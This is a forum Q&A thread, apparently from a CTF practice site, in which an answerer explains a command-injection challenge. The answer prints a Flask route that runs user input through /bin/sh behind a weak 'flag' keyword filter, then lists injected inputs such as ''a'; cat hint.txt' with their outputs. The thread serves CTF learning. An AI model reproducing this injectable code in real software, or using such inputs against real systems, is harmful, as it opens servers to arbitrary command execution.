어떻게풀어야하나요

자세히 처음부터 설명해주세요 ㅜㅜ

#misc
Author
Answers 1

This challenge is related to Command Injection

@APP.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        user_input = request.form.get('user_input')
        cmd = f'echo $({user_input})'
        if 'flag' in cmd:
            return render_template('index.html', result='No!')

        try:
            output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
            return render_template('index.html', result=output.decode('utf-8'))
        except subprocess.TimeoutExpired:
            return render_template('index.html', result='Timeout')
        except subprocess.CalledProcessError:
            return render_template('index.html', result='Error')

    return render_template('index.html')

As you can see when you enter any command then system will run it
Try to use command to find flag

  1. Enter "a"; ls: Result is app.py dream hint.txt requirements.txt static templates
  2. Enter "a"; cat hint.txt: Result is Where is Flag? ./dream/hack/hello
  3. Enter "a"; ls ./dream/hack/hello: Result is flag.txt
  4. However, if flag in your command, result is No!
    I think with this explanation you can do the rest to find the flag.
    Good luck!
2024.07.16. 19:10
Do you know the answer?
Share and earn points!
Answer and earn points